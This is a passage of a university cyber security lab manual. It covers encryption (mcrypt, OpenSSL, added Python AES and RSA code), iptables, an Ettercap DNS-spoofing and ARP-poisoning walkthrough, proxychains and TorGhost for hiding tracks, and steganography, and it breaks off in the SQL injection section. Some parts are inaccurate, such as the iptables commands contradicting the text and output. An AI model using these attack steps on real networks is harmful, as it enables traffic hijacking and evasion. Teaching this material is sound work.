r22 3-2 Cse (CS) Cse Lab Manual

The document is a Cyber Security Lab Manual for the academic year 2024-2025, prepared for the Data Science Branch at AVN Institute of Engineering and Technology. It outlines the vision and mission of the institution and department, along with course objectives and outcomes related to cyber security. The manual includes a series of lab experiments focused on practical applications of cyber security principles, such as encryption, firewall configuration, and attack demonstrations.

DEPARTMENT OF CSE(CYBER SECURITY)

ESSENTIALS OF CYBER SECURITY LAB MANUAL

Academic Year: 2024-2025

Data Science Branch III B. TECH II SEMESTER

Prepared by

P.SATHISH

Assistant Professor

AVN INSTITUTE OF ENGINEERING AND TECHNOLOGY

Affiliated to JNTUH, Patelguda (V), Ibrahimpatnam (M)

R. R Dist, TS - 501505

VISION AND MISSION OF THE INSTITUTION
VISION

To become a self-sustainable institution that is recognized for its new-age
engineering through an innovative teaching and learning culture, inculcating a
research and entrepreneurial ecosystem, and sustainable social impact in
the community.

MISSION

 To offer undergraduate and post-graduate programs that are supported
through an industry-relevant curriculum and innovative teaching and
learning processes that help students succeed in their professional
careers.
 To provide necessary support structures for students that will
contribute to their personal and professional growth and enable them to
become leaders in their respective fields.
 To provide faculty and students with an ecosystem that fosters research
and development through strategic partnerships with government
organizations and collaboration with industries.
 To contribute to the development of the region by using our
technological expertise to work with nearby communities and support
them in their social and economic growth.

VISION AND MISSION OF DEPARTMENT

VISION

To be recognized as a department of excellence by stimulating a learning
environment in which students and faculty will thrive and grow to achieve
their professional, institutional and societal goals.

MISSION

 To provide high quality technical education to students that will enable
life-long learning and build expertise in advanced technologies in
Computer Science and Engineering.
 To promote research and development by providing opportunities to
solve complex engineering problems in collaboration with industry and
government agencies.
 To encourage professional development of students that will inculcate
ethical values and leadership skills while working with the community to
address societal issues.

CYBER SECURITY ESSENTIALS LAB

B.TECH III YEAR II SEM

Course Objectives:

1. Understanding Cyber security Principles and Techniques
2. Application of Security Tools and Methods

Course Outcomes:

1. Practical Skills in Cyber security Tools and Techniques

2. Analytical and Problem-Solving Abilities

INDEX

Lab Experiments

1. Implement and test simple symmetric encryption algorithms like AES and DES.
2. Implement RSA encryption to demonstrate the concept of public and private keys.
3. Set up and configure a basic firewall using tools like iptables on Linux.
4. Demonstrate DNS spoofing and DNS cache poisoning attacks.
5. Set up a proxy server and demonstrate how attackers can use proxies to hide their tracks.
6. Demonstrate basic antiforensics techniques like i. Deleting logs ii. Using steganography tools.
7. Perform SQL injection on a test website and then implement measures to prevent it.
8. Create a simple application vulnerable to buffer overflow and demonstrate how to exploit it.
9. Implement an XSS attack on a test web application and demonstrate ways to mitigate such attacks.
10. Analyze a simple computer virus in a controlled environment and discuss detection and prevention strategies.
11. Investigate the functioning of a rootkit and demonstrate techniques to detect it.
12. Set up a basic IDS like Snort and test its effectiveness in detecting different types of attacks.

EXPERIMENT NO: 1

AIM:

Implement and test simple symmetric encryption algorithms like AES and DES.

STEP 1: Install mcrypt

┌──(kali㉿kali)-[~/sathish]
└─$ sudo apt install mcrypt
[sudo] password for kali:
mcrypt is already the newest version (2.6.8-8).
The following packages were automatically installed and are no longer required:
libbfio1 libc++1-19 libc++abi1-19 libsuperlu6 libunwind-19
Use 'sudo apt autoremove' to remove them.

Summary:
Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 255

Step 2: Check whether mcrypt is installed and list the ciphers it supports

┌──(kali㉿kali)-[~/sathish]
└─$ mcrypt --list
cast-128 (16): cbc cfb ctr ecb ncfb nofb ofb
gost (32): cbc cfb ctr ecb ncfb nofb ofb
rijndael-128 (32): cbc cfb ctr ecb ncfb nofb ofb
twofish (32): cbc cfb ctr ecb ncfb nofb ofb
arcfour (256): stream
cast-256 (32): cbc cfb ctr ecb ncfb nofb ofb
loki97 (32): cbc cfb ctr ecb ncfb nofb ofb
rijndael-192 (32): cbc cfb ctr ecb ncfb nofb ofb
saferplus (32): cbc cfb ctr ecb ncfb nofb ofb
wake (32): stream
blowfish-compat (56): cbc cfb ctr ecb ncfb nofb ofb
des (8): cbc cfb ctr ecb ncfb nofb ofb
rijndael-256 (32): cbc cfb ctr ecb ncfb nofb ofb
serpent (32): cbc cfb ctr ecb ncfb nofb ofb
xtea (16): cbc cfb ctr ecb ncfb nofb ofb
blowfish (56): cbc cfb ctr ecb ncfb nofb ofb
enigma (13): stream
rc2 (128): cbc cfb ctr ecb ncfb nofb ofb
tripledes (24): cbc cfb ctr ecb ncfb nofb ofb

Step 3: Create a file and write some text into it

┌──(kali㉿kali)-[~/sathish]
└─$ nano sample
(kali㉿kali)-[~/sathish]
└─$ cat sample
this is first experment in cyber security
┌──(kali㉿kali)-[~/sathish]
└─$ ls
byy.txt hello hello.txt hit.txt private.key public.key sample

Step 4: Encrypt the file (mcrypt derives the key from a passphrase and writes sample.nc)

┌──(kali㉿kali)-[~/sathish]
└─$ mcrypt sample
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: kali
Enter passphrase: kali

File sample was encrypted.

┌──(kali㉿kali)-[~/sathish]
└─$ cat sample.nc
m@rijndael-128 cbcmcrypt-sha1 [binary ciphertext follows; not printable]

Step 5: Remove the plaintext file, leaving only the encrypted sample.nc


┌──(kali㉿kali)-[~/sathish]
└─$ rm sample

┌──(kali㉿kali)-[~/sathish]
└─$ ls
byy.txt hello hello.txt hit.txt private.key public.key sample.nc

Step 6: Decrypt the file with the same passphrase

┌──(kali㉿kali)-[~/sathish]
└─$ mcrypt -d sample.nc
Enter passphrase: kali
File sample.nc was decrypted.

┌──(kali㉿kali)-[~/sathish]
└─$ ls
byy.txt hello.txt private.key sample
hello hit.txt public.key sample.nc

┌──(kali㉿kali)-[~/sathish]
└─$

┌──(kali㉿kali)-[~/sathish]
└─$ cat sample
this is first experment in cyber security

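The mcrypt run above hides what "rijndael-128 cbc" and "mcrypt-sha1" in the file header mean: a block cipher, a mode that chains blocks, and a key derived from the passphrase. The following added example (not mcrypt's code, and not a reader of its .nc container format) implements AES-128 from the FIPS-197 description with only the Python standard library, runs it in CTR mode, and derives the key from a passphrase with PBKDF2 (an assumption here; mcrypt's own "mcrypt-sha1" key derivation is a different scheme). The FIPS-197 and SP 800-38A test vectors are checked in the block so a student can confirm the implementation is an actual AES and not merely a round-tripping toy.

```python
"""AES-128 (FIPS-197) in CTR mode, standard library only. Added example for
Experiment 1; not mcrypt's code and not compatible with mcrypt's .nc files."""
import hashlib
import os


def _xtime(b):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    b <<= 1
    return (b ^ 0x1B) & 0xFF if b & 0x100 else b & 0xFF


def _gmul(a, b):
    """General GF(2^8) multiplication (the 2x and 3x of MixColumns)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r


def _build_sbox():
    """Derive the S-box: multiplicative inverse, then the affine map, then ^0x63."""
    sbox = [0] * 256
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gmul(x, y) == 1), 0) if x else 0
        s = inv
        for i in range(1, 5):                       # s ^= rotl(inv, 1..4)
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox[x] = s ^ 0x63
    return sbox


SBOX = _build_sbox()


def _expand_key(key):
    """Key schedule: 16-byte key -> 11 round keys of 16 bytes (column-major)."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]    # RotWord, then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def aes128_encrypt_block(key, block):
    """Encrypt one 16-byte block. State index i holds row i%4, column i//4."""
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                               # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]     # ShiftRows
        if rnd != 10:                                          # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [_gmul(a0, 2) ^ _gmul(a1, 3) ^ a2 ^ a3,
                      a0 ^ _gmul(a1, 2) ^ _gmul(a2, 3) ^ a3,
                      a0 ^ a1 ^ _gmul(a2, 2) ^ _gmul(a3, 3),
                      _gmul(a0, 3) ^ a1 ^ a2 ^ _gmul(a3, 2)]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]                 # AddRoundKey
    return bytes(s)


def aes128_ctr(key, iv, data):
    """CTR mode: XOR data with E_K(iv), E_K(iv+1), ...  Same call encrypts and decrypts."""
    out, ctr = bytearray(), int.from_bytes(iv, "big")
    for off in range(0, len(data), 16):
        block = ((ctr + off // 16) % (1 << 128)).to_bytes(16, "big")
        ks = aes128_encrypt_block(key, block)
        out += bytes(d ^ k for d, k in zip(data[off:off + 16], ks))
    return bytes(out)


def derive_key(passphrase, salt, iterations=200_000):
    """Passphrase -> 16-byte key. PBKDF2-HMAC-SHA256 is an assumption of this
    example; it is not mcrypt's 'mcrypt-sha1' derivation."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, iterations, 16)


def encrypt_with_passphrase(passphrase, plaintext):
    """Return salt || iv || ciphertext, with a fresh random salt and IV every time."""
    salt, iv = os.urandom(16), os.urandom(16)
    return salt + iv + aes128_ctr(derive_key(passphrase, salt), iv, plaintext)


def decrypt_with_passphrase(passphrase, blob):
    salt, iv, ct = blob[:16], blob[16:32], blob[32:]
    return aes128_ctr(derive_key(passphrase, salt), iv, ct)


if __name__ == "__main__":
    msg = b"this is first experment in cyber security"    # the lab's sample text
    blob = encrypt_with_passphrase("kali", msg)
    assert decrypt_with_passphrase("kali", blob) == msg
    print(blob[32:].hex())
```

Two points the mcrypt session does not make visible: a four-character passphrase such as "kali" gives the key derivation almost nothing to work with, whatever the cipher; and in CTR (as in CBC) the IV must never repeat under the same key, which is why the example draws it from os.urandom for every file.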
EXPERIMENT NO: 2

Aim: Implement RSA encryption to demonstrate the concept of public and private keys.

RSA encryption is a widely used cryptographic algorithm that relies on the use of a
public and private key pair to secure communications. To demonstrate the concept
of public and private keys using Kali Linux, we can go through the following
steps:

Step-by-Step Implementation of RSA Encryption

1. Install OpenSSL (If not installed)

OpenSSL is a toolkit that provides various cryptographic operations, including
RSA encryption and decryption. On Kali Linux, OpenSSL should be pre-installed,
but you can ensure it's installed by running the following commands:

sudo apt update
sudo apt install openssl

4. Encrypt a Message with the Public Key

┌──(kali㉿kali)-[~/sathish]
└─$ openssl rsautl -encrypt -pubin -inkey public.key -in hello.txt -out byy.txt

 -encrypt indicates you want to encrypt.
 -inkey public_key.pem (here public.key) specifies the public key to use.
 -pubin tells OpenSSL that the input key is a public key.
 -in message.txt (here hello.txt) is the file containing the message.
 -out encrypted_message.bin (here byy.txt) is the encrypted output file.

5. Decrypt the Message with the Private Key

To decrypt the message, use the private key. The command for decryption is:

┌──(kali㉿kali)-[~/sathish]
└─$ openssl rsautl -decrypt -inkey private.key -in byy.txt -out hit.txt

The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.

Enter pass phrase for private.key:

 -decrypt specifies decryption.
 -inkey private_key.pem (here private.key) tells OpenSSL to use the private key.
 -in encrypted_message.bin (here byy.txt) is the encrypted message.
 -out decrypted_message.txt (here hit.txt) will store the decrypted message.

After running the decryption command, the original message will be in the
decrypted_message.txt file.

6. Check the Decrypted Message

You can view the decrypted message by using the cat command:

┌──(kali㉿kali)-[~/sathish]
└─$ cat hit.txt

this is cyber security department

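The OpenSSL commands above treat the key pair as a black box. To show what the public and private keys actually are, here is an added example (not OpenSSL's code) of textbook RSA in plain Python: key generation from two primes, encryption with (n, e), decryption with (n, d), and the same trapdoor used in the other direction for signing. The primes are supplied as inputs so the run is reproducible; a real generator draws them at random at 1024 bits or more. One deliberate difference from the command line: rsautl applies PKCS#1 v1.5 padding, while this code applies none, and rsa_is_deterministic() shows the consequence. (OpenSSL 3 prints the rsautl deprecation notice seen above; pkeyutl accepts the same -encrypt/-decrypt, -pubin, -inkey, -in and -out options.)

```python
"""Textbook RSA, standard library only. Added example for Experiment 2; it is
not OpenSSL's implementation and, unlike rsautl, applies no padding."""
from math import gcd


def keypair_from_primes(p, q, e=65537):
    """Return ((n, e), (n, d)) for the given primes; raises if e is unusable."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)               # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)


def _to_int(data):
    return int.from_bytes(data, "big")


def _to_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def rsa_encrypt(public, message):
    """c = m^e mod n; anyone holding the public key can do this."""
    n, e = public
    m = _to_int(message)
    if m >= n:
        raise ValueError("message too long for this modulus")
    return pow(m, e, n)


def rsa_decrypt(private, ciphertext):
    """m = c^d mod n; only the private key holder can do this."""
    n, d = private
    return _to_bytes(pow(ciphertext, d, n))


def rsa_sign(private, message):
    """Same trapdoor the other way round: s = m^d mod n."""
    n, d = private
    return pow(_to_int(message), d, n)


def rsa_verify(public, message, signature):
    n, e = public
    return pow(signature, e, n) == _to_int(message)


def rsa_is_deterministic(public, message):
    """Without randomized padding, equal plaintexts give equal ciphertexts, so an
    observer can recognise repeats and guess-and-check short messages. This is
    why rsautl/pkeyutl pad before exponentiating."""
    return rsa_encrypt(public, message) == rsa_encrypt(public, message)


if __name__ == "__main__":
    # Two well-known primes, demo-sized only (modulus is about 60 bits).
    pub, priv = keypair_from_primes(1000000007, 998244353)
    c = rsa_encrypt(pub, b"hello")
    print(c, rsa_decrypt(priv, c))
    print("deterministic:", rsa_is_deterministic(pub, b"hello"))
```

The small classic pair p = 61, q = 53, e = 17 gives d = 2753 and encrypts the byte value 65 to 2790, which is a convenient check when working the exponentiations by hand.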
EXPERIMENT NO: 3

Aim : Set up and configure a basic firewall using tools like iptables on Linux.

What Is Iptables?

Iptables is a firewall program for Linux. It will monitor traffic from and to your
server using tables. These tables contain sets of rules, called chains, that will
filter incoming and outgoing data packets.

How does iptables work?

When a packet matches a rule, it is given a target, which can be another chain
or one of these special values:

 ACCEPT – will allow the packet to pass through.
 DROP – will not let the packet pass through.
 RETURN – stops the packet from traversing through a chain and tells it to
go back to the previous chain.
In this iptables tutorial, we are going to work with one of the default tables,
called filter. It consists of three chains:

 INPUT – controls incoming packets to the server.
 FORWARD – filters incoming packets that will be forwarded somewhere
else.
 OUTPUT – filters packets that are going out from your server.

1. Install iptables
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo apt install iptables
iptables is already the newest version (1.8.11-2).
The following packages were automatically installed and are no longer
required:
libbfio1 libgles-dev libpaper1
libc++1-19 libgles1 libsuperlu6
libc++abi1-19 libglvnd-core-dev libunwind-19
libegl-dev libglvnd-dev openjdk-23-jre
libfmt9 libjxl0.9 openjdk-23-jre-headless
libgl1-mesa-dev libmbedcrypto7t64 python3-appdirs
Use 'sudo apt autoremove' to remove them.

Summary:
Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 20
2. Check the status of your current iptables configuration by running

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables --version
iptables v1.8.11 (nf_tables)

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Here, the -L option is used to list all the rules; adding -v shows the
info in a more detailed format. Below is an example output:
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

You will now have the Linux iptables firewall installed. At this point, you will
notice that all chains are set to ACCEPT and have no rules. This is not secure
since any packet can come through without filtering.

3. Define chain rules

Defining a rule means appending it to the chain. To do this, you need to insert
the -A option (Append) right after the iptables command, like so:

sudo iptables -A
It will alert iptables that you are adding new rules to a chain. Then, you can
combine the command with other options, such as:
 -i (interface) — the network interface whose traffic you want to filter,
such as eth0, lo, ppp0, etc.
 -p (protocol) — the network protocol where your filtering process takes
place. It can be tcp, udp, udplite, icmp, sctp, icmpv6, and so on.
Alternatively, you can type all to choose every protocol.
 -s (source) — the address from which traffic comes. You can add a
hostname or IP address.
 --dport (destination port) — the destination port number of a protocol,
such as 22 (SSH), 443 (https), etc.
 -j (target) — the target name (ACCEPT, DROP, RETURN). You need
to insert this every time you make a new rule.
Enabling connections on HTTP, SSH, and SSL ports
 Next, we want http (port 80) and https (port 443) connections to work as
usual. To do this, we need to specify the protocol (-p) and the
corresponding port (--dport). You can execute these commands one by
one:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -A OUTPUT -p tcp --dport 80 -j REJECT

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -A OUTPUT -p tcp --dport 443 -j REJECT

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)


target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:http
REJECT tcp -- anywhere anywhere tcp dpt:http reject-with
icmp-port-unreachable
REJECT tcp -- anywhere anywhere tcp dpt:https reject-with
icmp-port-unreachable

To save the rule


┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables-save >iptables-rules.v1

┌──(kali㉿kali)-[~/Desktop]
└─$ ls
iptables-rules.v1 sample

Deleting rules
If you want to remove all rules and start with a clean slate, you can use the
-F option (flush):
sudo iptables -F

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)


target prot opt source destination

Chain OUTPUT (policy ACCEPT)


target prot opt source destination

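The experiment saves the rule set with iptables-save and notes that chains left at policy ACCEPT with no rules are "not secure since any packet can come through without filtering". The following added example (not part of the manual, and not iptables' own code) parses a dump in iptables-save format and reports exactly that condition, plus which destination ports the OUTPUT rules block, so the saved iptables-rules.v1 file can be audited rather than eyeballed. The sample dump is constructed to match the state shown after the two REJECT rules were appended.

```python
"""Audit an iptables-save dump for unfiltered built-in chains. Added example
for Experiment 3; the sample dump is constructed, not taken from a live host."""
import re

# Constructed: the filter table after the experiment's two REJECT rules.
SAMPLE_DUMP = """\
# Generated by iptables-save
*filter
:INPUT ACCEPT [120:9876]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [98:7654]
-A OUTPUT -p tcp -m tcp --dport 80 -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m tcp --dport 443 -j REJECT --reject-with icmp-port-unreachable
COMMIT
"""


def parse_iptables_save(dump):
    """Return {table: {chain: {"policy": str, "rules": [rule line, ...]}}}."""
    tables, table = {}, None
    for line in dump.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("*"):                    # "*filter" opens a table
            table = line[1:]
            tables[table] = {}
        elif line.startswith(":"):                  # ":INPUT ACCEPT [pkts:bytes]"
            chain, policy = line[1:].split()[:2]
            tables[table][chain] = {"policy": policy, "rules": []}
        elif line.startswith("-A "):                # "-A CHAIN <match> -j TARGET"
            chain = line.split()[1]
            tables[table].setdefault(chain, {"policy": "-", "rules": []})
            tables[table][chain]["rules"].append(line)
        elif line == "COMMIT":
            table = None
    return tables


def audit_filter_table(tables):
    """Flag built-in chains whose default is ACCEPT: with no rules they are
    unfiltered; with rules they still accept everything the rules do not name."""
    findings = []
    filt = tables.get("filter", {})
    for chain in ("INPUT", "FORWARD", "OUTPUT"):
        info = filt.get(chain)
        if info is None:
            findings.append(f"{chain}: chain missing from dump")
        elif info["policy"] == "ACCEPT" and not info["rules"]:
            findings.append(f"{chain}: policy ACCEPT with no rules (unfiltered)")
        elif info["policy"] == "ACCEPT":
            findings.append(f"{chain}: policy ACCEPT; {len(info['rules'])} rule(s) only narrow it")
    return findings


def rejected_ports(tables, chain="OUTPUT"):
    """Destination ports that a REJECT or DROP rule in the given chain matches."""
    ports = []
    for rule in tables.get("filter", {}).get(chain, {}).get("rules", []):
        m = re.search(r"--dport (\d+).*-j (REJECT|DROP)", rule)
        if m:
            ports.append(int(m.group(1)))
    return ports


if __name__ == "__main__":
    t = parse_iptables_save(SAMPLE_DUMP)
    for finding in audit_filter_table(t):
        print(finding)
    print("blocked outbound ports:", rejected_ports(t))
```

Run it against a real file with parse_iptables_save(open("iptables-rules.v1").read()); a default-deny INPUT policy (":INPUT DROP") with explicit ACCEPT rules for the services you need is the configuration the audit stops complaining about.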
EXPERIMENT NO: 4

Aim: Demonstrate DNS spoofing and DNS cache poisoning attacks.

Overview

In this article, I will be walking you through a common method of implementing
DNS cache poisoning on a network. I’ll illustrate my process with screenshots,
commands, and explanations. You are welcome to follow along and gain hands-on
experience with DNS spoofing to further reinforce the knowledge that you already
have.

Practical Demonstration

1. Find the IP address of your attacker machine

Since I’m doing this on my LAN, I can use my private IPv4 address, which I
truncated from the ifconfig command for the purpose of this demonstration.

┌──(root㉿kali)-[/home/kali/sathish]
└─# ifconfig
172.172.1.110

Configuring Ettercap

Quick Theory

Ettercap is being used in this context to resolve DNS queries coming from the
victim machine. Ettercap will respond to the DNS query with the IP address of the
attacking machine (Kali) such that when the victim visits the target domain, they
will be redirected to the attacker's IP address instead of the real IP address
associated with the domain name.
root㉿kali)-[/home/kali/sathish]
└─# mousepad /etc/ettercap/etter.conf

The changes to make are shown in green in the screenshot below.

Explanation: I set the UID and GID to 0 so that Ettercap has adequate permissions
on the machine. In this case, UID and GID 0 are root permissions.

Editing etter.dns
(root㉿kali)-[/home/kali/sathish]
└─# mousepad /etc/ettercap/etter.dns

Create the landing page of your malicious website

Now, we’ll prepare the HTML file that the victim will encounter once the DNS has
been spoofed. Since I’m using an Apache webserver, I’ll place the file in the root
directory on my machine,
nano index.html
<title>No More Planting Trees</title>

<h1>website hack</h1>

Start Malicious Web Server

As stated previously, I’m using Apache, so I just started the apache2 service.

Run Ettercap

On my Kali machine, I navigate to Applications > 09 — Sniffing & Spoofing >
ettercap-graphical in order to open the ettercap GUI.
(root㉿kali)-[/home/kali/sathish]
└─# ettercap -G

In the upper-right hand corner, I click on the right button and stop it.

Targets > Select targets.

I have white theme right now, don’t judge

I then enter the IP address of the victim machine and default gateway and press
“OK”. The default gateway can also be found in the ifconfig/ipconfig command
output of the victim machine.

Click the Earth icon in the upper right-hand corner and select ARP poisoning.

The default setting is okay here.

Then, click the three dots in the corner again. Go to Plugins > Manage plugins.

Select dns_spoof by double-clicking it. You’ll know that you’ve applied the plugin
when the asterisk appears to the left of the plugin name.

8. Visit The Domain on the Victim Machine

EXPERIMENT NO: 5

Aim: Set up a proxy server and demonstrate how attackers can use proxies to
hide their tracks.

What is a ProxyChain?
Proxychains are essentially a combination of proxies that reroute a TCP
connection to any server using different protocols, such as HTTP, HTTPS,
SOCKS4 and SOCKS5, making the connection secure and making it nearly
impossible for an observer to figure out what you are looking up online
and where you are. Through a very secure chain of proxies, ProxyChains
serves as an intermediary between the source IP and the endpoint IP,
concealing your identity. Most people mistakenly believe that VPNs are
safer than ProxyChains; however, the reality is that DNS leaks are more
common in VPNs, making them less secure than ProxyChains.
How to configure Proxychain?
There are two methods for configuring proxy chains.
 Method 1: Making use of Automated Tools
 Method 2: Manual configuration

Method 1: Making Use of Automated Tools

In this case, we’ll be employing TorGhost. It is an anonymization script that
basically redirects all internet traffic through the SOCKS5 Internet Protocol,
which TOR uses, and DNS requests are also redirected through the TOR network,
preventing DNS leaks.
Step 1: Navigate to the location where you want to install the tool (in this
case Downloads folder).
cd <folder name>

Step 2: Run the following command to install TorGhost:
git clone https://github.com/SusmithKrishnan/torghost

The command above will create a folder called torghost and install the tool
within it.

Step 3: After installing, navigate to the TorGhost folder that was created
in the preceding step.
cd torghost

Step 4: To view the folder’s contents, run the following command.
ls

Step 5: Execute the build script.
./build.sh

This will install the dependencies needed for the tool to function correctly.
Step 6: Execute the python file with the command.
python3 torghost.py

This will display the commands that can be used while running the file.
Step 7: To launch the tool, enter the following command.
python3 torghost.py -s

The system’s IP address will change in a few seconds. You can also verify
your new IP address by typing what’s my IP into Google.

Method 2: Manually Configuring Proxychains

Step 1: Navigate to the /etc folder.
cd /etc

Step 2: Enter the ls command to view the files.
ls

Step 3: Look for the file proxychains.conf or proxychains4.conf.

Step 4: Use gedit to edit it.
gedit proxychains.conf
OR
gedit proxychains4.conf

The file will be opened in gedit.


Step 5: Return to the file’s top.
It will resemble this.

Step 6: Uncomment the dynamic chain and comment out the strict chain
by removing and replacing the # sign.

 dynamic_chain – Will create a new chain of proxies whenever a new
connection is opened.
 strict_chain – Will only use the last chained proxy while opening every
new connection.
So, in this case, we make the dynamic chain the default setting.
Step 7: Now search the web for websites that provide proxies, in this
case, Geonode.com, and select the protocol you want to use; HTTP and
HTTPS were used for demonstration purposes, but SOCKS5 or SOCKS4
can also be used. Add as many proxies as you like.

Step 8: Scroll down to the bottom of the gedit file.

Step 9: Copy and paste the proxies in the format shown in the image.

Step 10: Save and close the file.

Done! Your system has now been set up to use multiple proxies. The
proxies will be used, but to be safe, restart the system.

EXPERIMENT NO: 6

Aim: Demonstrate basic antiforensics techniques like i. Deleting logs ii. Using
steganography tools.

How To Use Steghide And StegoSuite Steganography Tools In Kali Linux


Hiding information in plain sight can be crucial for privacy and security.
Steganography allows you to conceal messages within image and audio files. This
guide will teach beginners how to use two popular steganography tools in Kali
Linux - Steghide and StegoSuite. You'll learn how to hide and extract secret data
with these tools. Steganography is relevant today for securely transmitting
information over monitored networks. This guide aims to introduce newcomers to
this important privacy technique. With some simple steps, you can start using
steganography to communicate discreetly in Kali Linux.
What is Steghide?
Steghide is a free steganography program that allows you to hide secret files inside
other files. Steganography means concealing information within something else.
Steghide works by embedding your hidden data within an audio, image, or video
file. To anyone else, this carrier file will look and sound normal. But it secretly
contains your encrypted message or file. The Steghide tool lets you easily embed
your hidden information and extract it again with a password. This provides a way
to securely transmit messages or sensitive data over public networks or any system
where privacy is needed.
With just a few commands, Steghide makes it easy for even beginners to start
using basic steganography techniques in Kali Linux. It's a useful tool for learning
about and applying this form of concealed communication.
What is StegoSuite?
StegoSuite is another free steganography program included in Kali Linux. It offers
several steganography techniques in one toolkit. StegoSuite lets you hide
information within images and audio files, just like Steghide. But it also includes
additional steganography methods like hiding data in video files, OpenOffice
documents, HTML web pages, and PDF files. The goal of StegoSuite is to provide
an all-in-one steganography tool with many different hiding techniques. This gives
users more options to conceal messages or files. Like Steghide, StegoSuite aims to
securely embed secret data so it can't be detected by others. The carrier files look
harmless, but they secretly hold encrypted messages.
StegoSuite provides an easy-to-use interface and wizard for beginner users to start
applying steganography. With both Steghide and StegoSuite, Kali Linux is well-
equipped for basic steganography tasks.

Steghide : Installation & Usage

Steghide is a free and open source steganography program that allows you to hide
secret files or messages within audio, image, and video files. It works right from
the command line interface in Kali Linux. The key advantage of Steghide is that it
can embed data without reducing the quality or file size of the original carrier file.
This makes it difficult to detect that any hidden information has been added.
To use Steghide, you first need to install it in Kali Linux. You can do this easily by
typing the following command :
Command :
sudo apt-get install steghide
Output :

[Figure: Steghide tool installation]

Steghide is controlled completely through the terminal command line interface in
Kali Linux. To start using it, simply open a terminal window and type :
Command :
steghide
Output :

[Figure: Steghide usage commands]

Create a text file called "Secret.txt" and add some simple secret message text to it.
Save it in your working directory. Also place the image file you want to use to hide
the data, like "gfg.jpeg", in the same folder. Open a terminal window and use the
"steghide embed" command to embed "Secret.txt" into "gfg.jpeg"; -cf names the
cover file and -ef the file to embed.
Command :
steghide embed -cf gfg.jpeg -ef Secret.txt
Output :

[Figure: embedding completed]

It will ask you to create a password. Choose a strong password and enter it. This
will be needed to extract the hidden data later. Steghide will embed "Secret.txt"
inside "gfg.jpeg", encrypted under that password.

Now the image file contains the secret data entirely hidden within it. You can
safely share or store the image file like normal. When ready, use the following
below command with the password to retrieve the embedded " Secret.txt " file.
Command :
steghide extract -sf gfg.jpeg
cat Secret.txt
Output :

[Figure: data extraction]

You can also have Steghide show info about any files with embedded data. The
below command will verify if a file has hidden content inside it :
Command :
steghide info gfg.jpeg
It will confirm that there is embedded data, and report the encryption algorithm
and hidden file size.
Output :

[Figure: steghide info confirming that there is embedded data]
StegoSuite : Installation & Usage
StegoSuite is another free steganography tool included in Kali Linux. The main
difference from Steghide is that StegoSuite provides a graphical interface, making
it more user-friendly.
To install StegoSuite, open a terminal and type :
Command :
sudo apt-get install stegosuite
Output :

[Figure: StegoSuite tool installation]

Once you have installed the StegoSuite package in Kali Linux, you can easily start
using the program. Now you just need to type the following command to Launch
the StegoSuite Tool.
Command :
stegosuite gui
Output :

[Figure: StegoSuite GUI interface]
3. After that, click the "Browse Files" button and select the image you want to use
to hide the text.

[Figure: choose the image file]

4. After selecting the image file, enter the secret text message or just drag and
drop the "Secret.txt" file. Then set the password to encrypt the image file and
click on Embed. Follow the steps as shown in the GIF below.

[Figure: drag and drop the Secret.txt text file]

After that you will see a new file created on the Desktop named "gfg_embed.png";
this file includes our hidden file in it.

[Figure: encrypted image file]

Now the image file contains the secret data entirely hidden within it. You can safely
share or store the image file like normal. Whenever you want to see the hidden
text file, just use the "stegosuite gui" command, select the new file that was created
on the Desktop, type the password and hit the Extract button.

[Figure: extracted file]
EXPERIMENT NO: 7

Aim: Perform SQL injection on a test website and then implement measures
to prevent it.

What is SQL Injection?

SQL Injection is a code injection technique where an attacker executes malicious
SQL queries that control a web application’s database. With the right set of
queries, a user can gain access to information stored in databases. SQLMAP tests
whether a ‘GET’ parameter is vulnerable to SQL Injection.

Where can you use SQLMAP?

If you observe a web URL of the form
